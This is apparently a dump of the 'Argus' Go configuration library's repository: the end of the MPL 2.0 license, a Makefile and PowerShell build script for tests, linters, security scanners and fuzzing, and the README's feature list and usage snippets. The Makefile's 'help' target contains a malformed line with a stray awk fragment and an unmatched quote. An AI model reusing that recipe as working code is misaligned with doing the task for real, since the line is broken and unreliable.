You may choose to offer, and to charge a fee for, warranty, support,
indemnity or liability obligations to one or more recipients of Covered
Software. However, You may do so only on Your own behalf, and not on
behalf of any Contributor. You must make it absolutely clear that any
such warranty, support, indemnity, or liability obligation is offered by
You alone, and You hereby agree to indemnify every Contributor for any
liability incurred by such Contributor as a result of warranty, support,
indemnity or liability terms You offer. You may include additional
disclaimers of warranty and limitations of liability specific to any
jurisdiction.

4. Inability to Comply Due to Statute or Regulation
---------------------------------------------------

If it is impossible for You to comply with any of the terms of this
License with respect to some or all of the Covered Software due to
statute, judicial order, or regulation then You must: (a) comply with
the terms of this License to the maximum extent possible; and (b)
describe the limitations and the code they affect. Such description must
be placed in a text file included with all distributions of the Covered
Software under this License. Except to the extent prohibited by statute
or regulation, such description must be sufficiently detailed for a
recipient of ordinary skill to be able to understand it.

5. Termination
--------------

5.1. The rights granted under this License will terminate automatically
if You fail to comply with any of its terms. However, if You become
compliant, then the rights granted under this License from a particular
Contributor are reinstated (a) provisionally, unless and until such
Contributor explicitly and finally terminates Your grants, and (b) on an
ongoing basis, if such Contributor fails to notify You of the
non-compliance by some reasonable means prior to 60 days after You have
come back into compliance. Moreover, Your grants from a particular
Contributor are reinstated on an ongoing basis if such Contributor
notifies You of the non-compliance by some reasonable means, this is the
first time You have received notice of non-compliance with this License
from such Contributor, and You become compliant prior to 30 days after
Your receipt of the notice.

5.2. If You initiate litigation against any entity by asserting a patent
infringement claim (excluding declaratory judgment actions,
counter-claims, and cross-claims) alleging that a Contributor Version
directly or indirectly infringes any patent, then the rights granted to
You by any and all Contributors for the Covered Software under Section
2.1 of this License shall terminate.

5.3. In the event of termination under Sections 5.1 or 5.2 above, all
end user license agreements (excluding distributors and resellers) which
have been validly granted by You or Your distributors under this License
prior to termination shall survive termination.

************************************************************************
*                                                                      *
*  6. Disclaimer of Warranty                                           *
*  -------------------------                                           *
*                                                                      *
*  Covered Software is provided under this License on an "as is"       *
*  basis, without warranty of any kind, either expressed, implied, or  *
*  statutory, including, without limitation, warranties that the       *
*  Covered Software is free of defects, merchantable, fit for a        *
*  particular purpose or non-infringing. The entire risk as to the     *
*  quality and performance of the Covered Software is with You.        *
*  Should any Covered Software prove defective in any respect, You     *
*  (not any Contributor) assume the cost of any necessary servicing,   *
*  repair, or correction. This disclaimer of warranty constitutes an   *
*  essential part of this License. No use of any Covered Software is   *
*  authorized under this License except under this disclaimer.         *
*                                                                      *
************************************************************************

************************************************************************
*                                                                      *
*  7. Limitation of Liability                                          *
*  --------------------------                                          *
*                                                                      *
*  Under no circumstances and under no legal theory, whether tort      *
*  (including negligence), contract, or otherwise, shall any           *
*  Contributor, or anyone who distributes Covered Software as          *
*  permitted above, be liable to You for any direct, indirect,         *
*  special, incidental, or consequential damages of any character      *
*  including, without limitation, damages for lost profits, loss of    *
*  goodwill, work stoppage, computer failure or malfunction, or any    *
*  and all other commercial damages or losses, even if such party      *
*  shall have been informed of the possibility of such damages. This   *
*  limitation of liability shall not apply to liability for death or   *
*  personal injury resulting from such party's negligence to the       *
*  extent applicable law prohibits such limitation. Some               *
*  jurisdictions do not allow the exclusion or limitation of           *
*  incidental or consequential damages, so this exclusion and          *
*  limitation may not apply to You.                                    *
*                                                                      *
************************************************************************

8. Litigation
-------------

Any litigation relating to this License may be brought only in the
courts of a jurisdiction where the defendant maintains its principal
place of business and such litigation shall be governed by laws of that
jurisdiction, without reference to its conflict-of-law provisions.
Nothing in this Section shall prevent a party's ability to bring
cross-claims or counter-claims.

9. Miscellaneous
----------------

This License represents the complete agreement concerning the subject
matter hereof. If any provision of this License is held to be
unenforceable, such provision shall be reformed only to the extent
necessary to make it enforceable. Any law or regulation which provides
that the language of a contract shall be construed against the drafter
shall not be used to construe this License against a Contributor.

10. Versions of the License
---------------------------

10.1. New Versions

Mozilla Foundation is the license steward. Except as provided in Section
10.3, no one other than the license steward has the right to modify or
publish new versions of this License. Each version will be given a
distinguishing version number.

10.2. Effect of New Versions

You may distribute the Covered Software under the terms of the version
of the License under which You originally received the Covered Software,
or under the terms of any subsequent version published by the license
steward.

10.3. Modified Versions

If you create software not governed by this License, and you want to
create a new license for such software, you may create and use a
modified version of this License if you rename the license and remove
any references to the name of the license steward (except to note that
such modified license differs from this License).

10.4. Distributing Source Code Form that is Incompatible With Secondary
Licenses

If You choose to distribute Source Code Form that is Incompatible With
Secondary Licenses under the terms of this version of the License, the
notice described in Exhibit B of this License must be attached.

Exhibit A - Source Code Form License Notice
-------------------------------------------

  This Source Code Form is subject to the terms of the Mozilla Public
  License, v. 2.0. If a copy of the MPL was not distributed with this
  file, You can obtain one at http://mozilla.org/MPL/2.0/.

If it is not possible or desirable to put the notice in a particular
file, then You may include the notice in a location (such as a LICENSE
file in a relevant directory) where a recipient would be likely to look
for such a notice.

You may add additional accurate notices of copyright ownership.

Exhibit B - "Incompatible With Secondary Licenses" Notice
---------------------------------------------------------

  This Source Code Form is "Incompatible With Secondary Licenses", as
  defined by the Mozilla Public License, v. 2.0.


## /Makefile

``` path="/Makefile" 
# Go Makefile - AGILira Standard
# Usage: make help

.PHONY: help test race fmt vet lint security vulncheck mod-verify check deps clean build install tools
.DEFAULT_GOAL := help

# Variables
BINARY_NAME := $(shell basename $(PWD))
GO_FILES := $(shell find . -type f -name '*.go' -not -path './vendor/*')
TOOLS_DIR := $(HOME)/go/bin

# Colors for output
RED := \033[0;31m
GREEN := \033[0;32m
YELLOW := \033[1;33m
BLUE := \033[0;34m
NC := \033[0m # No Color

help: ## Show this help message
	@echo "$(BLUE)Available targets:$(NC)"
		@echo "  $(GREEN)%-15s$(NC) %s\n", $1, $2 }' $(MAKEFILE_LIST)
	@echo ""
	@echo "$(BLUE)Fuzz Testing Commands:$(NC)"
	@echo "  $(GREEN)fuzz$(NC)            Run fuzz tests (30s each)"
	@echo "  $(GREEN)fuzz-long$(NC)       Run extended fuzz tests (5m each)"
	@echo "  $(GREEN)fuzz-validate$(NC)   Fuzz ValidateSecurePath only"
	@echo "  $(GREEN)fuzz-parse$(NC)      Fuzz ParseConfig only"
	@echo "  $(GREEN)security-fuzz$(NC)   Security checks + fuzz testing"

test: ## Run tests
	@echo "$(YELLOW)Running tests...$(NC)"
	go test -v ./...

race: ## Run tests with race detector
	@echo "$(YELLOW)Running tests with race detector...$(NC)"
	go test -race -v ./...

coverage: ## Run tests with coverage
	@echo "$(YELLOW)Running tests with coverage...$(NC)"
	go test -coverprofile=coverage.out ./...
	go tool cover -html=coverage.out -o coverage.html
	@echo "$(GREEN)Coverage report generated: coverage.html$(NC)"

fmt: ## Format Go code
	@echo "$(YELLOW)Formatting Go code...$(NC)"
	go fmt ./...

vet: ## Run go vet
	@echo "$(YELLOW)Running go vet...$(NC)"
	go vet ./...

staticcheck: ## Run staticcheck
	@echo "$(YELLOW)Running staticcheck...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/staticcheck" ]; then \
		echo "$(RED)staticcheck not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	$(TOOLS_DIR)/staticcheck ./...

errcheck: ## Run errcheck
	@echo "$(YELLOW)Running errcheck...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/errcheck" ]; then \
		echo "$(RED)errcheck not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	$(TOOLS_DIR)/errcheck ./...

gosec: ## Run gosec security scanner
	@echo "$(YELLOW)Running gosec security scanner...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/gosec" ]; then \
		echo "$(RED)gosec not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	@$(TOOLS_DIR)/gosec ./... || (echo "$(YELLOW)  gosec completed with warnings (may be import-related)$(NC)" && exit 0)

vulncheck: ## Run govulncheck vulnerability scanner
	@echo "$(YELLOW)Running govulncheck...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/govulncheck" ]; then \
		echo "$(RED)govulncheck not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	$(TOOLS_DIR)/govulncheck ./...

mod-verify: ## Verify module dependencies
	@echo "$(YELLOW)Running go mod verify...$(NC)"
	go mod verify
	@echo "$(GREEN)Module verification passed.$(NC)"

lint: staticcheck errcheck ## Run all linters
	@echo "$(GREEN)All linters completed.$(NC)"

security: gosec ## Run security checks
	@echo "$(GREEN)Security checks completed.$(NC)"

security-fuzz: gosec fuzz ## Run security checks including fuzz testing
	@echo "$(GREEN)Security checks with fuzz testing completed.$(NC)"

check: mod-verify fmt vet lint security vulncheck test ## Run all checks (format, vet, lint, security, test)
	@echo "$(GREEN)All checks passed!$(NC)"

check-race: mod-verify fmt vet lint security vulncheck race ## Run all checks including race detector
	@echo "$(GREEN)All checks with race detection passed!$(NC)"

tools: ## Install development tools
	@echo "$(YELLOW)Installing development tools...$(NC)"
	go install honnef.co/go/tools/cmd/staticcheck@latest
	go install github.com/kisielk/errcheck@latest
	go install github.com/securego/gosec/v2/cmd/gosec@latest
	go install golang.org/x/vuln/cmd/govulncheck@latest
	@echo "$(GREEN)Tools installed successfully!$(NC)"

deps: ## Download and verify dependencies
	@echo "$(YELLOW)Downloading dependencies...$(NC)"
	go mod download
	go mod verify
	go mod tidy

clean: ## Clean build artifacts and test cache
	@echo "$(YELLOW)Cleaning...$(NC)"
	go clean
	go clean -testcache
	rm -f coverage.out coverage.html
	rm -f $(BINARY_NAME)

build: ## Build the binary
	@echo "$(YELLOW)Building $(BINARY_NAME)...$(NC)"
	go build -ldflags="-w -s" -o $(BINARY_NAME) .

install: ## Install the binary to $GOPATH/bin
	@echo "$(YELLOW)Installing $(BINARY_NAME)...$(NC)"
	go install .

bench: ## Run benchmarks
	@echo "$(YELLOW)Running benchmarks...$(NC)"
	go test -bench=. -benchmem ./...

fuzz: ## Run fuzz tests for security critical functions
	@echo "$(YELLOW)Running fuzz tests...$(NC)"
	@echo "$(BLUE)Fuzzing ValidateSecurePath for 30 seconds...$(NC)"
	go test -fuzz=FuzzValidateSecurePath -fuzztime=30s
	@echo "$(BLUE)Fuzzing ParseConfig for 30 seconds...$(NC)"
	go test -fuzz=FuzzParseConfig -fuzztime=30s
	@echo "$(GREEN)Fuzz testing completed!$(NC)"

fuzz-long: ## Run extended fuzz tests (5 minutes each)
	@echo "$(YELLOW)Running extended fuzz tests...$(NC)"
	@echo "$(BLUE)Fuzzing ValidateSecurePath for 5 minutes...$(NC)"
	go test -fuzz=FuzzValidateSecurePath -fuzztime=5m
	@echo "$(BLUE)Fuzzing ParseConfig for 5 minutes...$(NC)"
	go test -fuzz=FuzzParseConfig -fuzztime=5m
	@echo "$(GREEN)Extended fuzz testing completed!$(NC)"

fuzz-validate: ## Run fuzz test for ValidateSecurePath only
	@echo "$(YELLOW)Fuzzing ValidateSecurePath...$(NC)"
	go test -fuzz=FuzzValidateSecurePath -fuzztime=1m

fuzz-parse: ## Run fuzz test for ParseConfig only
	@echo "$(YELLOW)Fuzzing ParseConfig...$(NC)"
	go test -fuzz=FuzzParseConfig -fuzztime=1m

ci: ## Run CI checks (used in GitHub Actions)
	@echo "$(BLUE)Running CI checks...$(NC)"
	@make fmt vet lint security test coverage
	@echo "$(GREEN)CI checks completed successfully!$(NC)"

dev: ## Quick development check (fast feedback loop)
	@echo "$(BLUE)Running development checks...$(NC)"
	@make fmt vet test
	@echo "$(GREEN)Development checks completed!$(NC)"

pre-commit: check ## Run pre-commit checks (alias for 'check')

all: clean tools deps check build ## Run everything from scratch

# Show tool status
status: ## Show status of installed tools
	@echo "$(BLUE)Development tools status:$(NC)"
	@echo -n "staticcheck: "; [ -f "$(TOOLS_DIR)/staticcheck" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
	@echo -n "errcheck:    "; [ -f "$(TOOLS_DIR)/errcheck" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
	@echo -n "gosec:       "; [ -f "$(TOOLS_DIR)/gosec" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
	@echo -n "govulncheck: "; [ -f "$(TOOLS_DIR)/govulncheck" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
```

## /Makefile.ps1

```ps1 path="/Makefile.ps1" 
# PowerShell Build Script - AGILira Standard
# Windows equivalent of Makefile for Go development
# Usage: .\Makefile.ps1 [command]
# Example: .\Makefile.ps1 help

param(
    [Parameter(Position=0)]
    [string]$Command = "help"
)

# Variables
$BinaryName = Split-Path -Leaf (Get-Location)
$ToolsDir = "$env:GOPATH\bin"
if (-not $ToolsDir) { $ToolsDir = "$env:USERPROFILE\go\bin" }

# Colors for output
$Red = "Red"
$Green = "Green" 
$Yellow = "Yellow"
$Blue = "Cyan"

function Write-ColorOutput {
    param($Message, $Color = "White")
    Write-Host $Message -ForegroundColor $Color
}

function Test-ToolExists {
    param($ToolName)
    $toolPath = Join-Path $ToolsDir "$ToolName.exe"
    return Test-Path $toolPath
}

function Invoke-Help {
    Write-ColorOutput "Available commands:" $Blue
    Write-ColorOutput "  help          Show this help message" $Green
    Write-ColorOutput "  test          Run tests" $Green
    Write-ColorOutput "  race          Run tests with race detector" $Green
    Write-ColorOutput "  coverage      Run tests with coverage" $Green
    Write-ColorOutput "  fmt           Format Go code" $Green
    Write-ColorOutput "  vet           Run go vet" $Green
    Write-ColorOutput "  staticcheck   Run staticcheck" $Green
    Write-ColorOutput "  errcheck      Run errcheck" $Green
    Write-ColorOutput "  gosec         Run gosec security scanner" $Green
    Write-ColorOutput "  vulncheck     Run govulncheck vulnerability scanner" $Green
    Write-ColorOutput "  mod-verify    Verify module dependencies" $Green
    Write-ColorOutput "  lint          Run all linters" $Green
    Write-ColorOutput "  security      Run security checks" $Green
    Write-ColorOutput "  check         Run all checks (format, vet, lint, security, test)" $Green
    Write-ColorOutput "  check-race    Run all checks including race detector" $Green
    Write-ColorOutput "  tools         Install development tools" $Green
    Write-ColorOutput "  deps          Download and verify dependencies" $Green
    Write-ColorOutput "  clean         Clean build artifacts and test cache" $Green
    Write-ColorOutput "  build         Build the binary" $Green
    Write-ColorOutput "  install       Install the binary to GOPATH/bin" $Green
    Write-ColorOutput "  bench         Run benchmarks" $Green
    Write-ColorOutput "  ci            Run CI checks" $Green
    Write-ColorOutput "  dev           Quick development check" $Green
    Write-ColorOutput "  pre-commit    Run pre-commit checks (alias for 'check')" $Green
    Write-ColorOutput "  all           Run everything from scratch" $Green
    Write-ColorOutput "  status        Show status of installed tools" $Green
    Write-ColorOutput "" 
    Write-ColorOutput "Fuzz Testing Commands:" $Blue
    Write-ColorOutput "  fuzz          Run fuzz tests (30s each)" $Green
    Write-ColorOutput "  fuzz-long     Run extended fuzz tests (5m each)" $Green
    Write-ColorOutput "  fuzz-validate Fuzz ValidateSecurePath only" $Green
    Write-ColorOutput "  fuzz-parse    Fuzz ParseConfig only" $Green
    Write-ColorOutput "  security-fuzz Security checks + fuzz testing" $Green
}

function Invoke-Test {
    Write-ColorOutput "Running tests..." $Yellow
    go test -v "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Race {
    Write-ColorOutput "Running tests with race detector..." $Yellow
    go test -race -v "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Coverage {
    Write-ColorOutput "Running tests with coverage..." $Yellow
    $testArgs = @("-coverprofile=coverage.out", "./...")
    go test @testArgs
    if ($LASTEXITCODE -eq 0) {
        $coverArgs = @("-html=coverage.out", "-o", "coverage.html")
        go tool cover @coverArgs
        Write-ColorOutput "Coverage report generated: coverage.html" $Green
    }
}

function Invoke-Fmt {
    Write-ColorOutput "Formatting Go code..." $Yellow
    go fmt "./..."
}

function Invoke-Vet {
    Write-ColorOutput "Running go vet..." $Yellow
    go vet "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-StaticCheck {
    Write-ColorOutput "Running staticcheck..." $Yellow
    if (-not (Test-ToolExists "staticcheck")) {
        Write-ColorOutput "staticcheck not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\staticcheck.exe" "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-ErrCheck {
    Write-ColorOutput "Running errcheck..." $Yellow
    if (-not (Test-ToolExists "errcheck")) {
        Write-ColorOutput "errcheck not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\errcheck.exe" "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-GoSec {
    Write-ColorOutput "Running gosec security scanner..." $Yellow
    if (-not (Test-ToolExists "gosec")) {
        Write-ColorOutput "gosec not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\gosec.exe" "./..."
    if ($LASTEXITCODE -ne 0) {
        Write-ColorOutput "⚠️  gosec completed with warnings (may be import-related)" $Yellow
    }
}

function Invoke-Lint {
    Invoke-StaticCheck
    Invoke-ErrCheck
    Write-ColorOutput "All linters completed." $Green
}

function Invoke-Security {
    Invoke-GoSec
    Write-ColorOutput "Security checks completed." $Green
}

function Invoke-Vulncheck {
    Write-ColorOutput "Running govulncheck..." $Yellow
    if (-not (Test-ToolExists "govulncheck")) {
        Write-ColorOutput "govulncheck not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\govulncheck.exe" "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-ModVerify {
    Write-ColorOutput "Running go mod verify..." $Yellow
    go mod verify
    if ($LASTEXITCODE -ne 0) { 
        Write-ColorOutput "Module verification failed!" $Red
        exit $LASTEXITCODE 
    }
    Write-ColorOutput "Module verification passed." $Green
}

function Invoke-SecurityFuzz {
    Invoke-GoSec
    Invoke-Fuzz
    Write-ColorOutput "Security checks with fuzz testing completed." $Green
}

function Invoke-Check {
    Invoke-ModVerify
    Invoke-Fmt
    Invoke-Vet
    Invoke-Lint
    Invoke-Security
    Invoke-Vulncheck
    Invoke-Test
    Write-ColorOutput "All checks passed!" $Green
}

function Invoke-CheckRace {
    Invoke-Fmt
    Invoke-Vet
    Invoke-Lint
    Invoke-Security
    Invoke-Race
    Write-ColorOutput "All checks with race detection passed!" $Green
}

function Invoke-Tools {
    Write-ColorOutput "Installing development tools..." $Yellow
    go install honnef.co/go/tools/cmd/staticcheck@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go install github.com/kisielk/errcheck@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go install github.com/securego/gosec/v2/cmd/gosec@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go install golang.org/x/vuln/cmd/govulncheck@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Tools installed successfully!" $Green
}

function Invoke-Deps {
    Write-ColorOutput "Downloading dependencies..." $Yellow
    go mod download
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go mod verify
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go mod tidy
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Clean {
    Write-ColorOutput "Cleaning..." $Yellow
    go clean
    go clean -testcache
    if (Test-Path "coverage.out") { Remove-Item "coverage.out" }
    if (Test-Path "coverage.html") { Remove-Item "coverage.html" }
    if (Test-Path "$BinaryName.exe") { Remove-Item "$BinaryName.exe" }
}

function Invoke-Build {
    Write-ColorOutput "Building $BinaryName..." $Yellow
    go build -ldflags="-w -s" -o "$BinaryName.exe" .
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Install {
    Write-ColorOutput "Installing $BinaryName..." $Yellow
    go install .
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Bench {
    Write-ColorOutput "Running benchmarks..." $Yellow
    go test -bench=. -benchmem "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Fuzz {
    Write-ColorOutput "Running fuzz tests..." $Yellow
    Write-ColorOutput "Fuzzing ValidateSecurePath for 30 seconds..." $Blue
    go test -fuzz=FuzzValidateSecurePath -fuzztime=30s
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Fuzzing ParseConfig for 30 seconds..." $Blue
    go test -fuzz=FuzzParseConfig -fuzztime=30s
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Fuzz testing completed!" $Green
}

function Invoke-FuzzLong {
    Write-ColorOutput "Running extended fuzz tests..." $Yellow
    Write-ColorOutput "Fuzzing ValidateSecurePath for 5 minutes..." $Blue
    go test -fuzz=FuzzValidateSecurePath -fuzztime=5m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Fuzzing ParseConfig for 5 minutes..." $Blue
    go test -fuzz=FuzzParseConfig -fuzztime=5m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Extended fuzz testing completed!" $Green
}

function Invoke-FuzzValidate {
    Write-ColorOutput "Fuzzing ValidateSecurePath..." $Yellow
    go test -fuzz=FuzzValidateSecurePath -fuzztime=1m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-FuzzParse {
    Write-ColorOutput "Fuzzing ParseConfig..." $Yellow
    go test -fuzz=FuzzParseConfig -fuzztime=1m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-CI {
    Write-ColorOutput "Running CI checks..." $Blue
    Invoke-Fmt
    Invoke-Vet
    Invoke-Lint
    Invoke-Security
    Invoke-Test
    Invoke-Coverage
    Write-ColorOutput "CI checks completed successfully!" $Green
}

function Invoke-Dev {
    Write-ColorOutput "Running development checks..." $Blue
    Invoke-Fmt
    Invoke-Vet
    Invoke-Test
    Write-ColorOutput "Development checks completed!" $Green
}

function Invoke-All {
    Invoke-Clean
    Invoke-Tools
    Invoke-Deps
    Invoke-Check
    Invoke-Build
}

function Invoke-Status {
    Write-ColorOutput "Development tools status:" $Blue
    
    $staticcheckStatus = if (Test-ToolExists "staticcheck") { "✓ installed" } else { "✗ missing" }
    $staticcheckColor = if (Test-ToolExists "staticcheck") { $Green } else { $Red }
    Write-Host "staticcheck: " -NoNewline
    Write-ColorOutput $staticcheckStatus $staticcheckColor
    
    $errcheckStatus = if (Test-ToolExists "errcheck") { "✓ installed" } else { "✗ missing" }
    $errcheckColor = if (Test-ToolExists "errcheck") { $Green } else { $Red }
    Write-Host "errcheck:    " -NoNewline
    Write-ColorOutput $errcheckStatus $errcheckColor
    
    $gosecStatus = if (Test-ToolExists "gosec") { "✓ installed" } else { "✗ missing" }
    $gosecColor = if (Test-ToolExists "gosec") { $Green } else { $Red }
    Write-Host "gosec:       " -NoNewline
    Write-ColorOutput $gosecStatus $gosecColor
    
    $govulncheckStatus = if (Test-ToolExists "govulncheck") { "✓ installed" } else { "✗ missing" }
    $govulncheckColor = if (Test-ToolExists "govulncheck") { $Green } else { $Red }
    Write-Host "govulncheck: " -NoNewline
    Write-ColorOutput $govulncheckStatus $govulncheckColor
}

# Main execution
switch ($Command.ToLower()) {
    "help" { Invoke-Help }
    "test" { Invoke-Test }
    "race" { Invoke-Race }
    "coverage" { Invoke-Coverage }
    "fmt" { Invoke-Fmt }
    "vet" { Invoke-Vet }
    "staticcheck" { Invoke-StaticCheck }
    "errcheck" { Invoke-ErrCheck }
    "gosec" { Invoke-GoSec }
    "vulncheck" { Invoke-Vulncheck }
    "mod-verify" { Invoke-ModVerify }
    "lint" { Invoke-Lint }
    "security" { Invoke-Security }
    "check" { Invoke-Check }
    "check-race" { Invoke-CheckRace }
    "tools" { Invoke-Tools }
    "deps" { Invoke-Deps }
    "clean" { Invoke-Clean }
    "build" { Invoke-Build }
    "install" { Invoke-Install }
    "bench" { Invoke-Bench }
    "fuzz" { Invoke-Fuzz }
    "fuzz-long" { Invoke-FuzzLong }
    "fuzz-validate" { Invoke-FuzzValidate }
    "fuzz-parse" { Invoke-FuzzParse }
    "security-fuzz" { Invoke-SecurityFuzz }
    "ci" { Invoke-CI }
    "dev" { Invoke-Dev }
    "pre-commit" { Invoke-Check }
    "all" { Invoke-All }
    "status" { Invoke-Status }
    default {
        Write-ColorOutput "Unknown command: $Command" $Red
        Write-ColorOutput "Run '.\Makefile.ps1 help' for available commands." $Yellow
        exit 1
    }
}
```

## /README.md

# Argus: Dynamic Configuration Framework for Go

![Argus Banner](assets/banner.png)

High-performance configuration management framework for Go applications with zero-allocation performance, universal format support (JSON, YAML, TOML, HCL, INI, Properties), and an ultra-fast CLI powered by [Orpheus](https://github.com/agilira/orpheus).

[![CI/CD Pipeline](https://github.com/agilira/argus/actions/workflows/ci.yml/badge.svg)](https://github.com/agilira/argus/actions/workflows/ci.yml)
[![CodeQL](https://github.com/agilira/argus/actions/workflows/codeql.yml/badge.svg)](https://github.com/agilira/argus/actions/workflows/codeql.yml)
[![Security](https://img.shields.io/badge/security-gosec-brightgreen.svg)](https://github.com/agilira/argus/actions/workflows/ci.yml)
[![Go Report Card](https://goreportcard.com/badge/github.com/agilira/argus?v=2)](https://goreportcard.com/report/github.com/agilira/argus)
[![Test Coverage](https://img.shields.io/badge/coverage-87.7%25-brightgreen)](https://github.com/agilira/argus)
[![CLI Coverage](https://img.shields.io/badge/cli_coverage-77.5%25-green)](https://github.com/agilira/argus)
![Xantos Powered](https://img.shields.io/badge/Xantos-Powered-8A2BE2)
[![OpenSSF Best Practices](https://www.bestpractices.dev/projects/11273/badge)](https://www.bestpractices.dev/projects/11273)
[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)

## Live Demo

<div align="center">

See Argus in action - managing configurations across multiple formats with zero-allocation performance:

<picture>
  <source media="(max-width: 768px)" srcset="https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL.svg" width="100%">
  <source media="(max-width: 1024px)" srcset="https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL.svg" width="90%">
  <img src="https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL.svg" alt="Argus CLI Demo" style="max-width: 100%; height: auto;" width="800">
</picture>

*[Click to view interactive demo](https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL)*

</div>

**[Installation](#installation) • [Quick Start](#quick-start) • [Performance](#performance) • [Architecture](#architecture) • [Framework](#core-framework) • [Observability](#observability--integrations) • [Philosophy](#the-philosophy-behind-argus) • [Documentation](#documentation)**


### Features

- **Universal Format Support**: JSON, YAML, TOML, HCL, INI, Properties with auto-detection
- **ConfigWriter System**: Atomic configuration file updates with type-safe operations
- **Ultra-Fast CLI**: [Orpheus](https://github.com/agilira/orpheus)-powered CLI
- **Professional Grade Validation**: With detailed error reporting & performance recommendations
- **Security Hardened**: [Red-team tested](argus_security_test.go) against path traversal, injection, DoS and resource exhaustion attacks
- **Fuzz Tested**: [Comprehensive fuzzing](argus_fuzz_test.go) for ValidateSecurePath and ParseConfig edge cases
- **Zero-Allocation Design**: Pre-allocated buffers eliminate GC pressure in hot paths
- **Remote Config**: Distributed configuration with automatic fallback (Remote → Local). Currently available: [HashiCorp Consul](https://github.com/agilira/argus-provider-consul), [Redis](https://github.com/agilira/argus-provider-redis), [GitOps](https://github.com/agilira/argus-provider-git) with more to come..
- **Graceful Shutdown**: Timeout-controlled shutdown for Kubernetes and production deployments
- **OpenTelemetry Ready**: Async tracing and metrics with zero contamination of core library
- **Type-Safe Binding**: Zero-reflection configuration binding with fluent API (1.6M ops/sec)
- **Adaptive Optimization**: Four strategies (SingleEvent, SmallBatch, LargeBatch, Auto) 
- **Unified Audit System**: SQLite-based cross-application correlation with JSONL fallback
- **Scalable Monitoring**: Handle 1-1000+ files simultaneously with linear performance

## Compatibility and Support

Argus is designed for Go 1.24+ environments and follows Long-Term Support guidelines to ensure consistent performance across production deployments.

## Installation

```bash
go get github.com/agilira/argus
```

## Quick Start

### Multi-Source Configuration Loading
```go
import "github.com/agilira/argus"

// Load with automatic precedence: ENV vars > File > Defaults
config, err := argus.LoadConfigMultiSource("config.yaml")
if err != nil {
    log.Fatal(err)
}

watcher := argus.New(*config)
```

### Type-Safe Configuration Binding
```go
// Ultra-fast zero-reflection binding (1.6M ops/sec)
var (
    dbHost     string
    dbPort     int
    enableSSL  bool
    timeout    time.Duration
)

err := argus.BindFromConfig(parsedConfig).
    BindString(&dbHost, "database.host", "localhost").
    BindInt(&dbPort, "database.port", 5432).
    BindBool(&enableSSL, "database.ssl", true).
    BindDuration(&timeout, "database.timeout", 30*time.Second).
    Apply()
```

### Real-Time Configuration Updates
```go
// Watch any configuration format - auto-detected
watcher, err := argus.UniversalConfigWatcher("config.yaml", 
    func(config map[string]interface{}) {
        fmt.Printf("Config updated: %+v\n", config)
    })

watcher.Start()
defer watcher.Stop()
```

### Remote Configuration
```go
// Distributed configuration with automatic fallback
remoteManager := argus.NewRemoteConfigWithFallback(
    "https://consul.internal:8500/v1/kv/app/config",  // Primary
    "https://backup-consul.internal:8500/v1/kv/app/config", // Fallback
    "/etc/myapp/fallback.json", // Local fallback
)

watcher := argus.New(argus.Config{
    Remote: remoteManager.Config(),
})

// Graceful shutdown for Kubernetes deployments
defer watcher.GracefulShutdown(30 * time.Second)
```

### CLI Usage
```bash
# Ultra-fast configuration management CLI
argus config get config.yaml server.port
argus config set config.yaml database.host localhost
argus config convert config.yaml config.json
argus watch config.yaml --interval=1s
```
